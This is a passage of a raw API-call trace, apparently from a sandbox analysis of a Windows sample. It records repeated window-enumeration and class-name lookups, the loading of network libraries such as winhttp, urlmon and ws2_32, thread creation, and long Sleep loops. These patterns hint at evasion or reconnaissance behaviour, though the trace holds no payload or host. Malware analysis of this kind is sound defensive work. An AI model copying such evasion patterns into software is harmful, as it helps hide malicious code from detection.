(in: hWnd=0x1018a, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="zoo_differ_cls") returned 14 [0141.394] GetClassNameA (in: hWnd=0x10186, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="ruby_") returned 5 [0141.394] GetClassNameA (in: hWnd=0x10182, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="birthbeanclass") returned 14 [0141.395] GetClassNameA (in: hWnd=0x1017e, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="objectsvirusIsraeli") returned 19 [0141.395] GetClassNameA (in: hWnd=0x1017a, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="seekerapp") returned 9 [0141.395] GetClassNameA (in: hWnd=0x10176, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="potentiallywin") returned 14 [0141.395] GetClassNameA (in: hWnd=0x10172, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="Wheneverwnd") returned 11 [0141.395] GetClassNameA (in: hWnd=0x1016e, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="knewDifferenceskarenwnd") returned 23 [0141.395] GetClassNameA (in: hWnd=0x1016a, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="Definitelycls") returned 13 [0141.395] GetClassNameA (in: hWnd=0x10166, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="receptor_paintings_cls") returned 22 [0141.395] GetClassNameA (in: hWnd=0x10162, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="beveragesTapesdodclass") returned 22 [0141.395] GetClassNameA (in: hWnd=0x60110, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="abortion_Serbia_effect_") returned 23 [0141.395] GetClassNameA (in: hWnd=0x1010e, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="TASKENGINEWINDOWCLASS") returned 21 [0141.395] GetClassNameA (in: hWnd=0x20020, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="#43") returned 3 [0141.395] GetClassNameA (in: hWnd=0x10058, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="COMTASKSWINDOWCLASS") returned 19 [0141.395] GetClassNameA (in: hWnd=0x30044, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="Dwm") returned 3 [0141.395] GetClassNameA (in: hWnd=0x20018, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="CicLoaderWndClass") returned 17 [0141.395] GetClassNameA (in: hWnd=0x30062, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="TASKENGINEWINDOWCLASS") returned 21 [0141.395] GetClassNameA (in: hWnd=0x600a0, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="Progman") returned 7 [0141.395] GetClassNameA (in: hWnd=0x20108, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="IME") returned 3 [0141.395] GetClassNameA (in: hWnd=0x20148, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="MSCTFIME UI") returned 11 [0141.395] GetClassNameA (in: hWnd=0x4013e, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="IME") returned 3 [0141.395] GetClassNameA (in: hWnd=0x40112, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="IME") returned 3 [0141.396] GetClassNameA (in: hWnd=0x2005c, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="IME") returned 3 [0141.396] GetClassNameA (in: hWnd=0x20066, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="IME") returned 3 [0141.396] GetClassNameA (in: hWnd=0x101b0, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="IME") returned 3 [0141.396] GetClassNameA (in: hWnd=0x501bc, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="IME") returned 3 [0141.396] GetClassNameA (in: hWnd=0x101ac, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="IME") returned 3 [0141.396] GetClassNameA (in: hWnd=0x101a8, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="IME") returned 3 [0141.396] GetClassNameA (in: hWnd=0x101a4, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="IME") returned 3 [0141.396] GetClassNameA (in: hWnd=0x101a0, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="IME") returned 3 [0141.396] GetClassNameA (in: hWnd=0x1019c, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="IME") returned 3 [0141.396] GetClassNameA (in: hWnd=0x10198, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="IME") returned 3 [0141.396] GetClassNameA (in: hWnd=0x10194, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="IME") returned 3 [0141.396] GetClassNameA (in: hWnd=0x10190, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="IME") returned 3 [0141.396] GetClassNameA (in: hWnd=0x1018c, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="IME") returned 3 [0141.396] GetClassNameA (in: hWnd=0x10188, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="IME") returned 3 [0141.396] GetClassNameA (in: hWnd=0x10184, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="IME") returned 3 [0141.396] GetClassNameA (in: hWnd=0x10180, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="IME") returned 3 [0141.396] GetClassNameA (in: hWnd=0x1017c, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="IME") returned 3 [0141.396] GetClassNameA (in: hWnd=0x10178, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="IME") returned 3 [0141.396] GetClassNameA (in: hWnd=0x10174, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="IME") returned 3 [0141.396] GetClassNameA (in: hWnd=0x10170, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="IME") returned 3 [0141.397] GetClassNameA (in: hWnd=0x1016c, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="IME") returned 3 [0141.397] GetClassNameA (in: hWnd=0x10168, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="IME") returned 3 [0141.397] GetClassNameA (in: hWnd=0x10164, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="IME") returned 3 [0141.397] GetClassNameA (in: hWnd=0x10160, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="IME") returned 3 [0141.397] GetClassNameA (in: hWnd=0x700a4, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="IME") returned 3 [0141.397] GetClassNameA (in: hWnd=0x2002a, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="IME") returned 3 [0141.397] GetClassNameA (in: hWnd=0x1005a, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="IME") returned 3 [0141.397] GetClassNameA (in: hWnd=0x2001a, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="IME") returned 3 [0141.397] GetClassNameA (in: hWnd=0x20076, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="MSCTFIME UI") returned 11 [0141.397] GetClassNameA (in: hWnd=0x6009a, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="IME") returned 3 [0141.397] GetClassNameA (in: hWnd=0x2005e, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="IME") returned 3 [0141.397] Sleep (dwMilliseconds=0x64) [0141.501] EnumWindows (lpEnumFunc=0x5564058, lParam=0x54c0000) [0141.501] GetClassNameA (in: hWnd=0x200f2, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="ATL:000007FEF55B52C0") returned 20 [0141.501] GetClassNameA (in: hWnd=0x2010a, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="TaskSwitcherWnd") returned 15 [0141.501] GetClassNameA (in: hWnd=0x20080, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0141.501] GetClassNameA (in: hWnd=0x2006a, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="CiceroUIWndFrame") returned 16 [0141.501] GetClassNameA (in: hWnd=0x2012c, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0141.501] GetClassNameA (in: hWnd=0x20134, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0141.501] GetClassNameA (in: hWnd=0x2012e, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0141.501] GetClassNameA (in: hWnd=0x200f4, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0141.501] GetClassNameA (in: hWnd=0x20128, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0141.502] GetClassNameA (in: hWnd=0x20126, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0141.502] GetClassNameA (in: hWnd=0x4015a, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0141.502] GetClassNameA (in: hWnd=0x30144, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="Button") returned 6 [0141.502] GetClassNameA (in: hWnd=0x40140, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="Shell_TrayWnd") returned 13 [0141.502] GetClassNameA (in: hWnd=0x60096, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0141.502] GetClassNameA (in: hWnd=0x400e8, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0141.502] GetClassNameA (in: hWnd=0x400c2, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0141.502] GetClassNameA (in: hWnd=0x800de, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0141.502] GetClassNameA (in: hWnd=0x200e2, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="TaskListThumbnailWnd") returned 20 [0141.502] GetClassNameA (in: hWnd=0x2001e, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="CiceroUIWndFrame") returned 16 [0141.502] GetClassNameA (in: hWnd=0x20028, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="CiceroUIWndFrame") returned 16 [0141.502] GetClassNameA (in: hWnd=0x400ec, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="Desktop User Picture") returned 20 [0141.502] GetClassNameA (in: hWnd=0x4004a, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="FaxMonWinClass{3FD224BA-8556-47fb-B260-3E451BAE2793}") returned 52 [0141.502] GetClassNameA (in: hWnd=0x2004c, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="BluetoothNotificationAreaIconWindowClass") returned 40 [0141.502] GetClassNameA (in: hWnd=0x2004e, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="MS_WebcheckMonitor") returned 18 [0141.502] GetClassNameA (in: hWnd=0x300fa, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="PNIHiddenWnd") returned 12 [0141.503] Sleep (dwMilliseconds=0x64) [0141.610] EnumWindows (lpEnumFunc=0x5564058, lParam=0x54c0000) [0141.610] Sleep (dwMilliseconds=0x64) [0141.719] EnumWindows (lpEnumFunc=0x5564058, lParam=0x54c0000) [0141.719] Sleep (dwMilliseconds=0x64) [0141.828] EnumWindows (lpEnumFunc=0x5564058, lParam=0x54c0000) [0151.438] Sleep (dwMilliseconds=0x64) [0151.547] EnumWindows (lpEnumFunc=0x5564058, lParam=0x54c0000) [0154.629] EnumWindows (lpEnumFunc=0x5564058, lParam=0x54c0000) [0160.791] EnumWindows (lpEnumFunc=0x5564058, lParam=0x54c0000) [0164.808] Sleep (dwMilliseconds=0x64) [0165.068] EnumWindows (lpEnumFunc=0x5564058, lParam=0x54c0000) [0166.617] EnumWindows (lpEnumFunc=0x5564058, lParam=0x54c0000) [0174.973] Sleep (dwMilliseconds=0x64) [0175.072] EnumWindows (lpEnumFunc=0x5564058, lParam=0x54c0000) [0175.072] Sleep (dwMilliseconds=0x64) [0175.197] EnumWindows (lpEnumFunc=0x5564058, lParam=0x54c0000) [0175.197] Sleep (dwMilliseconds=0x64) [0175.306] EnumWindows (lpEnumFunc=0x5564058, lParam=0x54c0000) [0177.537] EnumWindows (lpEnumFunc=0x5564058, lParam=0x54c0000) [0193.316] Sleep (dwMilliseconds=0x64) [0193.480] EnumWindows (lpEnumFunc=0x5564058, lParam=0x54c0000) [0197.860] EnumWindows (lpEnumFunc=0x5564058, lParam=0x54c0000) [0210.406] Sleep (dwMilliseconds=0x64) [0210.530] EnumWindows (lpEnumFunc=0x5564058, lParam=0x54c0000) [0211.405] EnumWindows (lpEnumFunc=0x5564058, lParam=0x54c0000) [0215.601] Sleep (dwMilliseconds=0x64) [0215.750] EnumWindows (lpEnumFunc=0x5564058, lParam=0x54c0000) [0217.052] EnumWindows (lpEnumFunc=0x5564058, lParam=0x54c0000) [0225.086] Sleep (dwMilliseconds=0x64) [0225.194] EnumWindows (lpEnumFunc=0x5564058, lParam=0x54c0000) [0230.314] EnumWindows (lpEnumFunc=0x5564058, lParam=0x54c0000) [0256.981] EnumWindows (lpEnumFunc=0x5564058, lParam=0x54c0000) Thread: id = 312 os_tid = 0x84c [0228.636] LoadLibraryA (lpLibFileName="NTDLL") returned 0x76f50000 [0228.637] GetProcAddress (hModule=0x76f50000, lpProcName="RtlExitUserThread") returned 0x76f96930 [0228.638] GetProcessHeap () returned 0x210000 [0228.638] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x10) returned 0x478a9f0 [0228.638] LoadLibraryA (lpLibFileName="user32") returned 0x76d30000 [0228.638] GetProcessHeap () returned 0x210000 [0228.638] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x478a9f0) returned 1 [0228.638] GetProcessHeap () returned 0x210000 [0228.638] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x12) returned 0x478a9f0 [0228.638] LoadLibraryA (lpLibFileName="advapi32") returned 0x7fefdbf0000 [0228.638] GetProcessHeap () returned 0x210000 [0228.639] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x478a9f0) returned 1 [0228.639] GetProcessHeap () returned 0x210000 [0228.639] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x10) returned 0x478a9f0 [0228.639] LoadLibraryA (lpLibFileName="urlmon") returned 0x7fefd4b0000 [0228.639] GetProcessHeap () returned 0x210000 [0228.639] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x478a9f0) returned 1 [0228.639] GetProcessHeap () returned 0x210000 [0228.639] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0xf) returned 0x478a9f0 [0228.639] LoadLibraryA (lpLibFileName="ole32") returned 0x7fefe2b0000 [0228.639] GetProcessHeap () returned 0x210000 [0228.639] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x478a9f0) returned 1 [0228.639] GetProcessHeap () returned 0x210000 [0228.639] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x11) returned 0x478a9f0 [0228.639] LoadLibraryA (lpLibFileName="winhttp") returned 0x7fef7150000 [0228.640] GetProcessHeap () returned 0x210000 [0228.640] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x478a9f0) returned 1 [0228.640] GetProcessHeap () returned 0x210000 [0228.640] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x10) returned 0x478a9f0 [0228.640] LoadLibraryA (lpLibFileName="ws2_32") returned 0x7fefe260000 [0228.640] GetProcessHeap () returned 0x210000 [0228.640] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x478a9f0) returned 1 [0228.640] GetProcessHeap () returned 0x210000 [0228.640] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x10) returned 0x478a9f0 [0228.640] LoadLibraryA (lpLibFileName="dnsapi") returned 0x7fefc5b0000 [0228.641] GetProcessHeap () returned 0x210000 [0228.641] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x478a9f0) returned 1 [0228.641] GetProcessHeap () returned 0x210000 [0228.641] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x11) returned 0x478a9f0 [0228.641] LoadLibraryA (lpLibFileName="shell32") returned 0x7fefe4c0000 [0228.641] GetProcessHeap () returned 0x210000 [0228.641] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x478a9f0) returned 1 [0228.642] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x2b93f2c, lpParameter=0x2b80000, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x520 [0228.642] CloseHandle (hObject=0x520) returned 1 [0228.643] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x2b94008, lpParameter=0x2b80000, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x520 [0228.643] CloseHandle (hObject=0x520) returned 1 [0228.643] Sleep (dwMilliseconds=0xa) [0228.658] Sleep (dwMilliseconds=0xa) [0228.673] Sleep (dwMilliseconds=0xa) [0228.693] Sleep (dwMilliseconds=0xa) [0228.704] Sleep (dwMilliseconds=0xa) [0228.720] Sleep (dwMilliseconds=0xa) [0228.736] Sleep (dwMilliseconds=0xa) [0228.751] Sleep (dwMilliseconds=0xa) [0228.767] Sleep (dwMilliseconds=0xa) [0228.783] Sleep (dwMilliseconds=0xa) [0228.799] Sleep (dwMilliseconds=0xa) [0228.814] Sleep (dwMilliseconds=0xa) [0228.829] Sleep (dwMilliseconds=0xa) [0228.845] Sleep (dwMilliseconds=0xa) [0228.861] Sleep (dwMilliseconds=0xa) [0228.876] Sleep (dwMilliseconds=0xa) [0228.892] Sleep (dwMilliseconds=0xa) [0228.907] Sleep (dwMilliseconds=0xa) [0228.923] Sleep (dwMilliseconds=0xa) [0228.938] Sleep (dwMilliseconds=0xa) [0228.954] Sleep (dwMilliseconds=0xa) [0228.970] Sleep (dwMilliseconds=0xa) [0228.985] Sleep (dwMilliseconds=0xa) [0229.001] Sleep (dwMilliseconds=0xa) [0229.017] Sleep (dwMilliseconds=0xa) [0229.032] Sleep (dwMilliseconds=0xa) [0229.048] Sleep (dwMilliseconds=0xa) [0229.063] Sleep (dwMilliseconds=0xa) [0229.079] Sleep (dwMilliseconds=0xa) [0229.094] Sleep (dwMilliseconds=0xa) [0229.110] Sleep (dwMilliseconds=0xa) [0229.126] Sleep (dwMilliseconds=0xa) [0229.141] Sleep (dwMilliseconds=0xa) [0229.157] Sleep (dwMilliseconds=0xa) [0229.173] Sleep (dwMilliseconds=0xa) [0229.189] Sleep (dwMilliseconds=0xa) [0229.204] Sleep (dwMilliseconds=0xa) [0229.219] Sleep (dwMilliseconds=0xa) [0229.235] Sleep (dwMilliseconds=0xa) [0229.250] Sleep (dwMilliseconds=0xa) [0229.266] Sleep (dwMilliseconds=0xa) [0229.292] Sleep (dwMilliseconds=0xa) [0229.297] Sleep (dwMilliseconds=0xa) [0229.313] Sleep (dwMilliseconds=0xa) [0229.329] Sleep (dwMilliseconds=0xa) [0229.344] Sleep (dwMilliseconds=0xa) [0229.360] Sleep (dwMilliseconds=0xa) [0229.375] Sleep (dwMilliseconds=0xa) [0229.391] Sleep (dwMilliseconds=0xa) [0229.406] Sleep (dwMilliseconds=0xa) [0229.422] Sleep (dwMilliseconds=0xa) [0229.438] Sleep (dwMilliseconds=0xa) [0229.453] Sleep (dwMilliseconds=0xa) [0229.469] Sleep (dwMilliseconds=0xa) [0229.484] Sleep (dwMilliseconds=0xa) [0229.500] Sleep (dwMilliseconds=0xa) [0229.516] Sleep (dwMilliseconds=0xa) [0229.531] Sleep (dwMilliseconds=0xa) [0229.557] Sleep (dwMilliseconds=0xa) [0229.563] Sleep (dwMilliseconds=0xa) [0229.579] Sleep (dwMilliseconds=0xa) [0229.594] Sleep (dwMilliseconds=0xa) [0229.609] Sleep (dwMilliseconds=0xa) [0229.625] Sleep (dwMilliseconds=0xa) [0229.641] Sleep (dwMilliseconds=0xa) [0229.656] Sleep (dwMilliseconds=0xa) [0229.672] Sleep (dwMilliseconds=0xa) [0229.688] Sleep (dwMilliseconds=0xa) [0229.703] Sleep (dwMilliseconds=0xa) [0229.718] Sleep (dwMilliseconds=0xa) [0229.734] Sleep (dwMilliseconds=0xa) [0229.750] Sleep (dwMilliseconds=0xa) [0229.765] Sleep (dwMilliseconds=0xa) [0229.781] Sleep (dwMilliseconds=0xa) [0229.796] Sleep (dwMilliseconds=0xa) [0229.812] Sleep (dwMilliseconds=0xa) [0229.828] Sleep (dwMilliseconds=0xa) [0229.843] Sleep (dwMilliseconds=0xa) [0229.859] Sleep (dwMilliseconds=0xa) [0229.875] Sleep (dwMilliseconds=0xa) [0229.890] Sleep (dwMilliseconds=0xa) [0229.906] Sleep (dwMilliseconds=0xa) [0229.921] Sleep (dwMilliseconds=0xa) [0229.937] Sleep (dwMilliseconds=0xa) [0229.953] Sleep (dwMilliseconds=0xa) [0229.970] Sleep (dwMilliseconds=0xa) [0229.984] Sleep (dwMilliseconds=0xa) [0229.999] Sleep (dwMilliseconds=0xa) [0230.015] Sleep (dwMilliseconds=0xa) [0230.030] Sleep (dwMilliseconds=0xa) [0230.046] Sleep (dwMilliseconds=0xa) [0230.062] Sleep (dwMilliseconds=0xa) [0230.077] Sleep (dwMilliseconds=0xa) [0230.093] Sleep (dwMilliseconds=0xa) [0230.108] Sleep (dwMilliseconds=0xa) [0230.124] Sleep (dwMilliseconds=0xa) [0230.140] Sleep (dwMilliseconds=0xa) [0230.155] Sleep (dwMilliseconds=0xa) [0230.171] Sleep (dwMilliseconds=0xa) [0230.187] Sleep (dwMilliseconds=0xa) [0230.203] Sleep (dwMilliseconds=0xa) [0230.218] Sleep (dwMilliseconds=0xa) [0230.233] Sleep (dwMilliseconds=0xa) [0230.249] Sleep (dwMilliseconds=0xa) [0230.265] Sleep (dwMilliseconds=0xa) [0230.280] Sleep (dwMilliseconds=0xa) [0230.306] Sleep (dwMilliseconds=0xa) [0230.311] Sleep (dwMilliseconds=0xa) [0230.327] Sleep (dwMilliseconds=0xa) [0230.343] Sleep (dwMilliseconds=0xa) [0230.358] Sleep (dwMilliseconds=0xa) [0230.374] Sleep (dwMilliseconds=0xa) [0230.389] Sleep (dwMilliseconds=0xa) [0230.405] Sleep (dwMilliseconds=0xa) [0230.421] Sleep (dwMilliseconds=0xa) [0230.436] Sleep (dwMilliseconds=0xa) [0230.452] Sleep (dwMilliseconds=0xa) [0230.467] Sleep (dwMilliseconds=0xa) [0230.483] Sleep (dwMilliseconds=0xa) [0230.499] Sleep (dwMilliseconds=0xa) [0230.514] Sleep (dwMilliseconds=0xa) [0230.530] Sleep (dwMilliseconds=0xa) [0230.545] Sleep (dwMilliseconds=0xa) [0230.561] Sleep (dwMilliseconds=0xa) [0230.579] Sleep (dwMilliseconds=0xa) [0230.592] Sleep (dwMilliseconds=0xa) [0230.608] Sleep (dwMilliseconds=0xa) [0230.623] Sleep (dwMilliseconds=0xa) [0230.639] Sleep (dwMilliseconds=0xa) [0230.655] Sleep (dwMilliseconds=0xa) [0230.670] Sleep (dwMilliseconds=0xa) [0230.687] Sleep (dwMilliseconds=0xa) [0230.701] Sleep (dwMilliseconds=0xa) [0230.717] Sleep (dwMilliseconds=0xa) [0230.733] Sleep (dwMilliseconds=0xa) [0230.748] Sleep (dwMilliseconds=0xa) [0230.764] Sleep (dwMilliseconds=0xa) [0230.779] Sleep (dwMilliseconds=0xa) [0230.795] Sleep (dwMilliseconds=0xa) [0230.810] Sleep (dwMilliseconds=0xa) [0230.826] Sleep (dwMilliseconds=0xa) [0230.842] Sleep (dwMilliseconds=0xa) [0230.858] Sleep (dwMilliseconds=0xa) [0230.873] Sleep (dwMilliseconds=0xa) [0230.889] Sleep (dwMilliseconds=0xa) [0230.904] Sleep (dwMilliseconds=0xa) [0230.920] Sleep (dwMilliseconds=0xa) [0230.935] Sleep (dwMilliseconds=0xa) [0230.951] Sleep (dwMilliseconds=0xa) [0230.967] Sleep (dwMilliseconds=0xa) [0230.982] Sleep (dwMilliseconds=0xa) [0230.998] Sleep (dwMilliseconds=0xa) [0231.014] Sleep (dwMilliseconds=0xa) [0231.029] Sleep (dwMilliseconds=0xa) [0231.044] Sleep (dwMilliseconds=0xa) [0231.060] Sleep (dwMilliseconds=0xa) [0231.077] Sleep (dwMilliseconds=0xa) [0231.091] Sleep (dwMilliseconds=0xa) [0231.107] Sleep (dwMilliseconds=0xa) [0231.123] Sleep (dwMilliseconds=0xa) [0231.138] Sleep (dwMilliseconds=0xa) [0231.154] Sleep (dwMilliseconds=0xa) [0231.169] Sleep (dwMilliseconds=0xa) [0231.185] Sleep (dwMilliseconds=0xa) [0231.201] Sleep (dwMilliseconds=0xa) [0231.216] Sleep (dwMilliseconds=0xa) [0231.232] Sleep (dwMilliseconds=0xa) [0231.247] Sleep (dwMilliseconds=0xa) [0231.263] Sleep (dwMilliseconds=0xa) [0231.279] Sleep (dwMilliseconds=0xa) [0231.304] Sleep (dwMilliseconds=0xa) [0231.310] Sleep (dwMilliseconds=0xa) [0231.325] Sleep (dwMilliseconds=0xa) [0231.341] Sleep (dwMilliseconds=0xa) [0231.356] Sleep (dwMilliseconds=0xa) [0231.372] Sleep (dwMilliseconds=0xa) [0231.388] Sleep (dwMilliseconds=0xa) [0231.403] Sleep (dwMilliseconds=0xa) [0231.419] Sleep (dwMilliseconds=0xa) [0231.434] Sleep (dwMilliseconds=0xa) [0231.450] Sleep (dwMilliseconds=0xa) [0231.466] Sleep (dwMilliseconds=0xa) [0231.481] Sleep (dwMilliseconds=0xa) [0231.497] Sleep (dwMilliseconds=0xa) [0231.512] Sleep (dwMilliseconds=0xa) [0231.528] Sleep (dwMilliseconds=0xa) [0231.544] Sleep (dwMilliseconds=0xa) [0231.559] Sleep (dwMilliseconds=0xa) [0231.575] Sleep (dwMilliseconds=0xa) [0231.594] Sleep (dwMilliseconds=0xa) [0231.617] Sleep (dwMilliseconds=0xa) [0231.622] Sleep (dwMilliseconds=0xa) [0231.638] Sleep (dwMilliseconds=0xa) [0231.653] Sleep (dwMilliseconds=0xa) [0231.668] Sleep (dwMilliseconds=0xa) [0231.684] Sleep (dwMilliseconds=0xa) [0231.709] Sleep (dwMilliseconds=0xa) [0231.715] Sleep (dwMilliseconds=0xa) [0231.740] Sleep (dwMilliseconds=0xa) [0231.746] Sleep (dwMilliseconds=0xa) [0231.762] Sleep (dwMilliseconds=0xa) [0231.778] Sleep (dwMilliseconds=0xa) [0231.815] Sleep (dwMilliseconds=0xa) [0231.839] Sleep (dwMilliseconds=0xa) [0231.840] Sleep (dwMilliseconds=0xa) [0231.864] Sleep (dwMilliseconds=0xa) [0231.871] Sleep (dwMilliseconds=0xa) [0231.887] Sleep (dwMilliseconds=0xa) [0231.902] Sleep (dwMilliseconds=0xa) [0231.918] Sleep (dwMilliseconds=0xa) [0231.934] Sleep (dwMilliseconds=0xa) [0231.958] Sleep (dwMilliseconds=0xa) [0231.965] Sleep (dwMilliseconds=0xa) [0231.988] Sleep (dwMilliseconds=0xa) [0231.996] Sleep (dwMilliseconds=0xa) [0232.012] Sleep (dwMilliseconds=0xa) [0232.031] Sleep (dwMilliseconds=0xa) [0232.043] Sleep (dwMilliseconds=0xa) [0232.059] Sleep (dwMilliseconds=0xa) [0232.083] Sleep (dwMilliseconds=0xa) [0232.090] Sleep (dwMilliseconds=0xa) [0232.113] Sleep (dwMilliseconds=0xa) [0232.121] Sleep (dwMilliseconds=0xa) [0232.137] Sleep (dwMilliseconds=0xa) [0232.152] Sleep (dwMilliseconds=0xa) [0232.168] Sleep (dwMilliseconds=0xa) [0232.184] Sleep (dwMilliseconds=0xa) [0232.242] Sleep (dwMilliseconds=0xa) [0232.267] Sleep (dwMilliseconds=0xa) [0232.277] Sleep (dwMilliseconds=0xa) [0232.302] Sleep (dwMilliseconds=0xa) [0232.308] Sleep (dwMilliseconds=0xa) [0232.332] Sleep (dwMilliseconds=0xa) [0232.339] Sleep (dwMilliseconds=0xa) [0232.355] Sleep (dwMilliseconds=0xa) [0232.371] Sleep (dwMilliseconds=0xa) [0232.395] Sleep (dwMilliseconds=0xa) [0232.402] Sleep (dwMilliseconds=0xa) [0232.417] Sleep (dwMilliseconds=0xa) [0232.433] Sleep (dwMilliseconds=0xa) [0232.490] Sleep (dwMilliseconds=0xa) [0232.495] Sleep (dwMilliseconds=0xa) [0232.519] Sleep (dwMilliseconds=0xa) [0232.527] Sleep (dwMilliseconds=0xa) [0232.560] Sleep (dwMilliseconds=0xa) [0232.584] Sleep (dwMilliseconds=0xa) [0232.594] Sleep (dwMilliseconds=0xa) [0232.605] Sleep (dwMilliseconds=0xa) [0232.620] Sleep (dwMilliseconds=0xa) [0232.644] Sleep (dwMilliseconds=0xa) [0232.651] Sleep (dwMilliseconds=0xa) [0232.667] Sleep (dwMilliseconds=0xa) [0232.683] Sleep (dwMilliseconds=0xa) [0232.707] Sleep (dwMilliseconds=0xa) [0232.714] Sleep (dwMilliseconds=0xa) [0232.729] Sleep (dwMilliseconds=0xa) [0232.745] Sleep (dwMilliseconds=0xa) [0232.770] Sleep (dwMilliseconds=0xa) [0232.776] Sleep (dwMilliseconds=0xa) [0232.792] Sleep (dwMilliseconds=0xa) [0232.808] Sleep (dwMilliseconds=0xa) [0232.831] Sleep (dwMilliseconds=0xa) [0232.868] Sleep (dwMilliseconds=0xa) [0232.870] Sleep (dwMilliseconds=0xa) [0232.894] Sleep (dwMilliseconds=0xa) [0232.901] Sleep (dwMilliseconds=0xa) [0232.917] Sleep (dwMilliseconds=0xa) [0232.932] Sleep 